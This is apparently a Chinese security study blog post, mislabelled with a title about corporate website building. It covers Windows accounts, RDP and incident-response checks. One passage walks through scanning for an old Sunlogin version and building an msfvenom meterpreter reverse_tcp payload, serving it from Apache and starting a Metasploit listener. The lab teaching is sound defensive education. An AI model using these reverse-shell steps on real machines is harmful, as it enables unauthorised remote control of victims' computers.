企业官网建设流程全解析

上一篇讲了用户和用户组、权限、远程桌面连接、cmd

免责声明：本文仅用于网络安全合法技术学习，所有实验均在个人自建虚拟机靶机环境中完成，未对任何第三方系统进行未经授权的测试，所有实验操作必须在自建靶场、官方授权测试环境内完成，禁止触碰任何第三方生产环境与真实业务系统，严禁将文中内容用于非法入侵他人系统，违者需自行承担法律责任。

我们了解到最高的权限的用户是：system，我们的系统，面板看不到，因为就是我们系统本身；

管理员用户:administrator，管理员组的组长；权限最低的用户：guest；用户组是去批量管理一些用户的，管理员组：administrators；

权限怎么去查看？右击鼠标、点击属性、安全、点击添加、点击允许；

远程桌面连接：一台电脑连接到另外一台电脑上面去，长沙连接上海的电脑的IP需要是公网的IP，如果是内网IP的话，那就需要我们在同一网段上面，用的是RDP协议，默认开放的端口：3389

cmd：命令提示窗口：，打开：win+r，输入cmd；或者win，输入cmd，点击回车，也可以选择用管理员身份打开，点击文件夹，在上面的路径下输入cmd，也可以调用命令提示窗口，uac，用户的更改控制的一个设置

系统漏洞：攻击手法，命令提示窗口，添加用户，普通用户，后门用户，

rdp：远程登录

站在攻击方的角度，如果是我们自己的电脑中招了，我们应该怎样去进行排查呢？

首先按win键，点击计算机，右击计算机，点击管理，打开本地用户和组，点击用户，查看有没有用户不是自己创建的，如果不是的话，我们可以进行点击鼠标右键，要么删掉，要么禁用掉，点击属性即可禁用掉，还可以查看注册表：win+r，输入regedit，点击第三个目录，展开，点击SAM进行查看，右击鼠标，赋予权限，在安全里面设置用户组的权限，根据需求给对应的对象添加权限，win+r，输入cmd，然后输入whoami，查看当前用户，输入：net user （当前用户的名字），在刚刚的安全框里面添加：administrator，点击检查，确定，再点击添加的用户，赋予权限，刷新一下，names里面的都是用户的名字的信息，系统漏洞如何去修复？打补丁和升级

goby：扫描系统漏洞的工具，扫描工具：nmap，扫描组件：winpcap，npcap，只要wires hark能够抓包就可以了，就不需要下载这两个组件

第三方应用：不是Windows系统或者手机厂商自带的软件，而是通过一些别的途径下载到计算机的，是人写的代码就会有漏洞和bug，攻击者一旦发现并利用的话，就能变成可入侵的漏洞

这里演示的小实验就是通过攻击者的视角去看一下：向日葵低版本的一个漏洞，在运行时会随机开放一个大于40000的端口，攻击者刚好利用这样的一个特征，去找到入侵的突破口

第一步：搭建环境：首先要准备一个向日葵的低版本这样一个环境，前提是要知道对方的IP地址，能否ping得通对方的IP，打开kali，nmap -p 40000-65535 （目标主机的IP地址），就会得到几个大于40000的端口号，去进行验证，能在浏览器里面进去的就是能够进去的,在kaili里面输入sudo su,进行一个提升权限，输入密码，输入命令：nmap -p 40000-65535 （主机IP），会显示一串端口号，将所有端口号复制下来，在桌面生成一个文档，将所有端口号粘贴到文档里面，后面的一坨可以进行删除，在IP地址前面补充一个https://,每一个都粘贴

批量在浏览器里面访问先添加一个工具，打开浏览器，点击浏览器右上角的三条横杠，点击扩展与主题，搜索一个：pasty,回车，添加一个组件，固定到地址栏上面，将文档里面的所有URL复制，然后直接点击插件，有回复的就是我们能够用向日葵低版本能够进去的端口，就是可以通过向日葵低版本能够进去的端口。

关于低版本漏洞我们应该如何去进行防御？第三方漏洞程序漏洞如何去进行防御？当然是升级了，本质上是因为版本太低的原因，我们升级就可以了，还可以打补丁，如果里面有木马要怎么办？那我们要搞清楚这个木马程序是如何去执行的，一个木马攻击流程的核心，如何去控制我们的电脑的，然后在通过相应的手段去进行应对，例如装个360或者火绒。

生成木马程序步骤：

①msfconsole #启动metasploit

②# 生成反向连接木马 （reverse-tcp：目标机主动连接攻击机）

③msfvenom -p Windows/meterpreter/reverse-tcp LHOST=本地主机，也就是攻击者的主机 LPORT=攻击者的端口 -f exe >shell.exe

④在自己的攻击者服务器里面去开一个服务，这个服务是web服务，首先开一个apache2的服务，再把木马程序放在我的固定的文件夹里面然后让对方主动来下载我的这一个文件夹就好了，在kali里面新开一个窗口

⑤：先mv shell.exe /var/www/html，这是移动，将我现在的exe程序移动到指定的目录当中，移动的时候需要管理员身份，所以我们需要提权，就是提高权限：sudo su，再去启动刚刚讲的这个service apache2 start服务，那么我们就能通过访问通过访问IP然后去写这个shell.exe的程序，然后通过靶机去下载，若能下载则说明服务器搭建成功，靶机就可以下载木马了，然后再在浏览器里面搜索：kali的IP，访问kali的主机，主机下有一个shell.exe的程序，回车现在已经对方主机有了这样一个木马程序，先开一个监控器：msfconsole，use exploit/multi/handler # 加载监听模块，set payload Windows/meterpreter / reverse_tcp #与木马payload一致，设置攻击手段，这个手段要与制作木马的手段一模一样，set lhost 0.0.0.0#监听所有网卡，set lport xxxx # 与木马lport一致，run # 启动监听。

⑥对于陌生的文件我们应该怎样去做？先丢给杀毒软件或者在虚拟机里面运行，或者在进程里面查看，首先右击任务栏，进入任务管理器，点击进程，可以去查看相关进程，查看是否有陌生的进程，可以直接禁用掉或者，也可以找到文件位置，进行排查，或者在云沙箱里面进行分析，有爆红，报读的文件就可以结束进程，然后就可以删掉该文件夹了，也可以打开任务管理器，打开性能，右下角有一个打开资源监视器，也可以在CPU下面有一个关联句柄，里面可以搜索相关文件，它会给我们一个相应的结果，在这里去进行一个关闭，结束进程即可，一定要删掉该文件，斩草除根，不给后来留祸患。

在桌面点击win+r，然后输入一个msinfo32，里面有一个系统信息，下面有一个软件环境，软件环境下面有一个正在运行的任务，这个比我们的任务管理器要更多一点，在我们的任务管理器里边有一个右击查看文件所在位置，在系统信息里面去做查看的时候然而msinfo32里面展示的信息更多，这个是更加详细的，能够去查看我们的进程的更加完整的一个路径，这个会更加完全一点。

如果用命令控制界面怎么去查看呢：win+r，输入cmd，回车过后，输入netstat -ano，查看外部的地址，也可以查看我们的本地地址，还能够去查看端口号，可以看我的本地地址连接的是哪一个外部地址，我本地地址的端口号连接的是外部地址的哪一个端口号，可以去看一下有没有外面的地址，就是一些陌生的IP，和一些不常用的端口，我们可以去放在微步社区里面去进行一个排查，或者用一个云沙箱去进行一个分析。

启动项自启动程序：即开机自己启动，不需要手动去进行启动；

计划任务：定时去运行，比如说我想要让某一个应用程序在某一个时刻运行，我们就可以把该应用程序加到某个定时任务里面去，如果我们把这个进程结束了，他还会进行一个重启。

我们排查的核心：排查一下启动项和计划任务

启动项排查的方法：打开任务管理器，上面有一个启动的选项卡，里面显示的就是启动自启项，如果不想让它自启动，那么我们就可以将其禁用掉，开机就不会再去自启动了，开发者如果为空的话，很大可能是木马程序。

计划任务的排查方法：在搜索栏里面搜索任务计划程序，里面有一个计划任务程序库，点击文件夹，里面有一些陌生的触发器的话，我们去进行停止和关闭就好了。

还有一个排查叫做服务；

服务：运行在后台的一些程序，相当于我们的一个隐身的，代表着我们看不到，但是它是存在的，有些服务它会伪装成一个系统的服务，在我们的后台去偷偷的运行，这种木马比启动项和计划任务更隐蔽，因为他不可见，但是他还存在，所以我们就需要通过服务去进行一个排查我们看不到的服务我们就可以复制它的名称，到我们的一个平台上去进行访问。{菱角社区}

win+r，输入：service.msc里面有运行的状态，可以右击停止服务，我们查看服务要怎同样去查看呢：我们可以去借助工具或者是日志去进行查看，去进行一一排查，第三方工具：PCHunter，火绒和Windows自带的杀毒也都可以。

日志：是计算机的一个监控，打开日志的方法：点击win，然后右击计算机，点击管理， 进去之后有一个事件查看器，下面有一个windows日志，点击安全，筛选当前日志，可以选择相应时间的日志，有一个日志号：4624，叫做登录成功，一般用户不会通过system的一个安全ID去进行登录，既然已经登录成功了，那我们就去看一下是否有前后门用户，有没有创建木马，4625的一个时间ID就是登陆失败，如果有一坨4625的时间ID那只能说明我们的电脑遭受了远程爆破攻击

如何去进行一个防护呢？Windows都有一个Definer，对于这个病毒的话，我们可以去做一个扫描，我们可以去下载一个火绒或者360去进行一个加固，去做一个防护，定期去做一个排查我们的电脑有没有问题，也可以结合我们的电脑自带的windowsfier去进行查杀。

防火墙：在开始里面，搜索防火墙，点击高级设置，会有入站出站的规则，入站规则大于出站规则，出站规则相当于我们自己出门，入站规则相当于别人到我们家来，我们也可以去设置一些入站规则，添加一些新的规则，可以新建一个程序去连接，或者是点击某个窗口去做连接，点击下一步，去设置新的规则是一个TCP还是UDP，和端口，配置好想要的特定的一个入站规则，ping命令，就是在对方主机的入站规则有一个叫做ICMP回显的这一个让它没有通过导致对方没有，如果对方电脑它的防火墙是一个开启的状态，再去通过ping命令也是ping不通的，因为防火墙开着的，将入站规则，给禁用掉，则也可以ping得通，电脑访问不到8080端口也是因为防火墙把这个给拦截了。

端口和防火墙有关系，我们通过防火墙我们需要去关闭一个40000以上的一个不常用的端口，去限制一些陌生IP的访问，减少攻击者扫描入侵的一个机会，提高自己的安全防范措施和意识。